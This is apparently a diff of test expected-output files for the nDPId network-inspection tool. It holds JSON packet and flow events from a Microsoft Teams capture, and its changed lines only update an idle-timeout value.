00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041692578,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":180000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -390,22 +390,22 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1587041693515,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693515,"pkt":"EBMx8Tl2KDc3AG3ICABFAABg5p0AAEARo1PAqAEGNHL6e8NgDZYATAKlAAMAMCESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1587041693517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041693517,"pkt":"EBMx8Tl2KDc3AG3ICABFAABfDxsAAP8RKRvAqAEGwKgBAdnVADUASzsZd8IBAAABAAAAAAAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAQ=="} 00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1587041693530,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1587041693530,"pkt":"KDc3AG3IEBMx8Tl2CABFAACrU5xAADkRak7AqAEBwKgBBgA12dUAlwAAd8KBgAABAAAAAQAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAcAfAAYAAQAAAAUAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMA6AAAnEQAAA4QAAAEsAAk6gAAAADw="} 00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1587041693572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693572,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJQAAGwR4OU0cvp7wKgBBg2Ww2AAw6emARMApyESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAh\/IMTdT4SN+oAgAAgAAcHVcadqCg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgF74AAEARcjPAqAEGNHL6e8N0DZYATEppAAMAMCESpEI9x0RmdejywONbcT4ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} 